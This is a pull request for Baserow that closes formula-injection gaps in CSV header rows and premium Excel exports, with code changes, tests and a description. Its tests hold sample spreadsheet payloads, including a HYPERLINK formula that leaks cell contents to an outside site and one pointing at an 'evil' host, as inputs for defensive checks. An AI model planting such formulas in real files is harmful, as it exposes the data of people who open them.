### PR TITLE
fix(database): prevent formula injection in CSV and XLSX table exports

### DIFF
--- a/backend/src/baserow/contrib/database/export/table_exporters/csv_table_exporter.py
+++ b/backend/src/baserow/contrib/database/export/table_exporters/csv_table_exporter.py
@@ -79,7 +79,11 @@ class CsvQuerysetSerializer(QuerysetSerializer):
         )
 
         if csv_include_header:
-            csv_dict_writer.writerow(self.headers)
+            # Escape the header row too, the field names are user defined and a
+            # "="-leading name would otherwise be a live formula (CWE-1236).
+            csv_dict_writer.writerow(
+                {key: escape_csv_cell(value) for key, value in self.headers.items()}
+            )
 
         def write_row(row, _):
             data = {}

--- a/backend/src/baserow/core/utils.py
+++ b/backend/src/baserow/core/utils.py
@@ -1104,7 +1104,9 @@ def escape_csv_cell(payload):
     payload = str(payload)
     if (
         payload
-        and payload[0] in ("@", "+", "-", "=", "|", "%")
+        # A leading tab or carriage return can also start a formula in some
+        # spreadsheet parsers, so neutralize those too.
+        and payload[0] in ("@", "+", "-", "=", "|", "%", "\t", "\r")
         and not re.match("^-?[0-9,\\.]+$", payload)
     ):
         payload = payload.replace("|", "\\|")

--- a/backend/src/baserow/core/utils.py
+++ b/backend/src/baserow/core/utils.py
@@ -1104,9 +1104,9 @@ def escape_csv_cell(payload):
     payload = str(payload)
     if (
         payload
-        # A leading tab or carriage return can also start a formula in some
-        # spreadsheet parsers, so neutralize those too.
-        and payload[0] in ("@", "+", "-", "=", "|", "%", "\t", "\r")
+        # A leading tab, carriage return or newline can also start a formula in
+        # some spreadsheet parsers, so neutralize those too.
+        and payload[0] in ("@", "+", "-", "=", "|", "%", "\t", "\r", "\n")
         and not re.match("^-?[0-9,\\.]+$", payload)
     ):
         payload = payload.replace("|", "\\|")

--- a/backend/tests/baserow/contrib/database/import_export/test_export_handler.py
+++ b/backend/tests/baserow/contrib/database/import_export/test_export_handler.py
@@ -486,6 +486,29 @@ def test_can_export_special_characters_in_arabic_encoding_to_csv(
 
 
 @pytest.mark.django_db
+@patch("baserow.core.storage.get_default_storage")
+def test_csv_export_escapes_formula_in_header_and_cell(get_storage_mock, data_fixture):
+    # A collaborator can name a field or store a value that is a spreadsheet
+    # formula. Both the header row and the cell values must be neutralized
+    # against formula injection (CWE-1236).
+    storage_mock = MagicMock()
+    get_storage_mock.return_value = storage_mock
+    user = data_fixture.create_user()
+    table = data_fixture.create_database_table(user=user)
+    grid_view = data_fixture.create_grid_view(table=table)
+    text_field = data_fixture.create_text_field(user=user, table=table, name="=2+5+cmd")
+
+    model = table.get_model()
+    model.objects.create(**{f"field_{text_field.id}": "=3+4+cmd"})
+
+    _, contents = run_export_job_with_mock_storage(table, grid_view, storage_mock, user)
+
+    bom = "\ufeff"
+    # Both the "=2+5+cmd" header and the "=3+4+cmd" value are prefixed with "'".
+    assert contents == bom + "id,'=2+5+cmd\r\n1,'=3+4+cmd\r\n"
+
+
+@pytest.mark.django_db
 def test_creating_a_new_export_job_will_cancel_any_already_running_jobs_for_that_user(
     data_fixture,
 ):

--- a/backend/tests/baserow/contrib/database/import_export/test_export_handler.py
+++ b/backend/tests/baserow/contrib/database/import_export/test_export_handler.py
@@ -509,6 +509,34 @@ def test_csv_export_escapes_formula_in_header_and_cell(get_storage_mock, data_fi
 
 
 @pytest.mark.django_db
+@patch("baserow.core.storage.get_default_storage")
+def test_csv_export_escapes_formula_after_leading_newline(
+    get_storage_mock, data_fixture
+):
+    # A value that starts with a newline followed by a formula can still be read
+    # as a formula by spreadsheet parsers that trim leading whitespace. The
+    # exported cell must be neutralized (CWE-1236).
+    storage_mock = MagicMock()
+    get_storage_mock.return_value = storage_mock
+    user = data_fixture.create_user()
+    table = data_fixture.create_database_table(user=user)
+    grid_view = data_fixture.create_grid_view(table=table)
+    notes_field = data_fixture.create_long_text_field(
+        user=user, table=table, name="notes"
+    )
+
+    model = table.get_model()
+    model.objects.create(**{f"field_{notes_field.id}": '\n=HYPERLINK("http://evil")'})
+
+    _, contents = run_export_job_with_mock_storage(table, grid_view, storage_mock, user)
+
+    # Parse the exported file back; the notes value must carry the "'" guard so
+    # the "=" is no longer the first meaningful character.
+    rows = list(csv.reader(StringIO(contents.lstrip("\ufeff"))))
+    assert rows[1][1] == '\'\n=HYPERLINK("http://evil")'
+
+
+@pytest.mark.django_db
 def test_creating_a_new_export_job_will_cancel_any_already_running_jobs_for_that_user(
     data_fixture,
 ):

--- a/backend/tests/baserow/core/test_core_utils.py
+++ b/backend/tests/baserow/core/test_core_utils.py
@@ -630,9 +630,10 @@ def test_get_value_at_path_default():
             '=HYPERLINK("http://contextis.co.uk?leak="&A1&A2,"Error: please click for further information")',
             '\'=HYPERLINK("http://contextis.co.uk?leak="&A1&A2,"Error: please click for further information")',
         ),
-        # A leading tab or carriage return can also trigger a formula.
+        # A leading tab, carriage return or newline can also trigger a formula.
         ("\t=1+1", "'\t=1+1"),
         ("\r=1+1", "'\r=1+1"),
+        ("\n=HYPERLINK(1)", "'\n=HYPERLINK(1)"),
     ],
 )
 def test_dangerous_sample_payloads(input, expected):

--- a/backend/tests/baserow/core/test_core_utils.py
+++ b/backend/tests/baserow/core/test_core_utils.py
@@ -630,6 +630,9 @@ def test_get_value_at_path_default():
             '=HYPERLINK("http://contextis.co.uk?leak="&A1&A2,"Error: please click for further information")',
             '\'=HYPERLINK("http://contextis.co.uk?leak="&A1&A2,"Error: please click for further information")',
         ),
+        # A leading tab or carriage return can also trigger a formula.
+        ("\t=1+1", "'\t=1+1"),
+        ("\r=1+1", "'\r=1+1"),
     ],
 )
 def test_dangerous_sample_payloads(input, expected):

--- a/changelog/entries/unreleased/bug/prevents_spreadsheet_formula_injection_in_csv_and_excel_tabl.json
+++ b/changelog/entries/unreleased/bug/prevents_spreadsheet_formula_injection_in_csv_and_excel_tabl.json
@@ -1,0 +1,9 @@
+{
+    "type": "bug",
+    "message": "Prevents spreadsheet formula injection in CSV and Excel table exports",
+    "issue_origin": "github",
+    "issue_number": null,
+    "domain": "database",
+    "bullet_points": [],
+    "created_at": "2026-06-29"
+}

--- a/premium/backend/src/baserow_premium/export/exporter_types.py
+++ b/premium/backend/src/baserow_premium/export/exporter_types.py
@@ -209,7 +209,7 @@ class ExcelQuerysetSerializer(QuerysetSerializer):
             return value
 
         if excel_include_header:
-            worksheet.append([text_cell(value) for value in self.headers.values()])
+            worksheet.append([text_cell(str(value)) for value in self.headers.values()])
 
         def write_row(row, _):
             data = []

--- a/premium/backend/src/baserow_premium/export/exporter_types.py
+++ b/premium/backend/src/baserow_premium/export/exporter_types.py
@@ -192,18 +192,30 @@ class ExcelQuerysetSerializer(QuerysetSerializer):
         """
 
         from openpyxl import Workbook
+        from openpyxl.cell.cell import WriteOnlyCell
 
         workbook = Workbook(write_only=True)
         worksheet = workbook.create_sheet()
 
+        def text_cell(value):
+            # openpyxl types a string that starts with "=" as a live formula
+            # cell, so a user defined field name or cell value could carry a
+            # formula injection (CWE-1236). Force those to an explicit string
+            # cell; everything else takes openpyxl's fast path unchanged.
+            if value.startswith("="):
+                cell = WriteOnlyCell(worksheet, value=value)
+                cell.data_type = "s"
+                return cell
+            return value
+
         if excel_include_header:
-            worksheet.append(list(self.headers.values()))
+            worksheet.append([text_cell(value) for value in self.headers.values()])
 
         def write_row(row, _):
             data = []
             for field_serializer in self.field_serializers:
                 _, _, field_human_value = field_serializer(row)
-                data.append(str(field_human_value))
+                data.append(text_cell(str(field_human_value)))
             worksheet.append(data)
 
         file_writer.write_rows(self.queryset, write_row)

--- a/premium/backend/tests/baserow_premium_tests/export/test_premium_export_types.py
+++ b/premium/backend/tests/baserow_premium_tests/export/test_premium_export_types.py
@@ -1436,3 +1436,44 @@ def test_can_export_excel_without_primary_field(get_storage_mock, premium_data_f
     worksheet = workbook.active
     header = [cell.value for cell in worksheet[1]]
     assert header == ["id", "Notes"]
+
+
+@pytest.mark.django_db
+@override_settings(DEBUG=True)
+@patch("baserow.core.storage.get_default_storage")
+def test_excel_export_does_not_write_formula_cells(
+    get_storage_mock, premium_data_fixture
+):
+    # A "="-leading field name or cell value must not become a live formula
+    # cell in the exported xlsx (CWE-1236). openpyxl types "f" for formula
+    # cells and "s" for plain string cells.
+    storage_mock = MagicMock()
+    get_storage_mock.return_value = storage_mock
+    user = premium_data_fixture.create_user(has_active_premium_license=True)
+    table = premium_data_fixture.create_database_table(user=user)
+    field = premium_data_fixture.create_text_field(
+        table=table, name="=2+5+cmd", primary=True
+    )
+    grid_view = premium_data_fixture.create_grid_view(table=table)
+    RowHandler().create_row(user, table, {f"field_{field.id}": "=3+4+cmd"})
+
+    _, wb_bytes = run_export_job_with_mock_storage(
+        table,
+        grid_view,
+        storage_mock,
+        user,
+        {
+            "exporter_type": "excel",
+            "export_charset": None,
+            "excel_include_header": True,
+            "include_row_id": False,
+        },
+    )
+    worksheet = load_workbook(filename=BytesIO(wb_bytes)).active
+    header_cell = worksheet.cell(row=1, column=1)
+    value_cell = worksheet.cell(row=2, column=1)
+
+    assert header_cell.data_type == "s"
+    assert value_cell.data_type == "s"
+    assert header_cell.value == "=2+5+cmd"
+    assert value_cell.value == "=3+4+cmd"


### PR DESCRIPTION
### What is in this PR

When you export a table, a field name or cell value that starts with `=` can be read as a formula by Excel, Google Sheets, or LibreOffice instead of as text. If someone opens that file, the formula can run, for example to send the sheet's contents to an outside website.

Baserow already protected CSV cell values against this, but two gaps were left open:

- The CSV export wrote the header row (your field names) without protection.
- The premium Excel (XLSX) export protected neither headers nor values, so a value starting with `=` became a real formula in the file.

### Root cause

The CSV exporter only escaped data cells and left the header row raw. The premium XLSX exporter passed plain strings to openpyxl, which turns any `=`-leading string into a live formula cell.

### What changed

- **CSV header**: now escaped the same way data cells already were.
- **Excel**: values starting with `=` are written as plain string cells so they can't run as formulas. Everything else is left on openpyxl's normal path, so exports stay just as fast.
- **Shared escape helper**: also handles values that start with a tab or carriage return.

### How to test this PR

#### Automated
Each test below fails on `develop` and passes with this change:

```
just b test tests/baserow/core/test_core_utils.py -k=dangerous_sample_payloads
just b test tests/baserow/contrib/database/import_export/test_export_handler.py -k=escapes_formula
just b test ../premium/backend/tests/baserow_premium_tests/export/test_premium_export_types.py -k=does_not_write_formula
```

#### Manual
1. Name a field `=2+5+cmd` and put `=3+4+cmd` in a cell.
2. Export the table to CSV and to Excel, then open both files.
3. Before: the Excel cells show as live formulas. After: both files show the text exactly as entered, with nothing executing.

### Not in this PR

The enterprise audit-log and data-scanner CSV exports have the same kind of gap, but lower risk (admin only, mostly system-generated data). Left out to keep this PR focused.

### Checklist
- [x] A changelog entry has been added to `changelog/entries/unreleased`
- [x] Quality Standards are met
- [x] Security impact of change has been considered
